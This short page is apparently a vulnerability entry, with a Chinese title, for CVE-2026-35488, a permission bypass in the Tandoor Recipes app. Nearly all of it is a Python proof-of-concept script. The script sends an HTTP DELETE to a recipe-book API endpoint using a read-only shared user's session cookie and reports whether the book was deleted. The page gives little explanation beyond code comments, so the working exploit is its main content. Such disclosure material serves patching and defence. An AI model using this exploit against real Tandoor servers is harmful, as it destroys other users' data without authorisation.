CVE-2026-35488 Tandoor Recipes权限绕过漏洞

import requests # Target API endpoint for a specific RecipeBook target_url = "http://target-domain.com/api/recipe-book/{recipe_book_id}/" # Cookies of a user who has shared access (read-only intended) attacker_cookies = { "sessionid": "valid_shared_user_session_token" } # Attempt to delete the recipe book using HTTP DELETE method # Vulnerability: The server does not check if DELETE is a SAFE_METHOD response = requests.delete(target_url, cookies=attacker_cookies) if response.status_code == 204 or response.status_code == 200: print("[+] Exploit successful: RecipeBook deleted via permission bypass.") else: print(f"[-] Exploit failed: Status code {response.status_code}") print(response.text)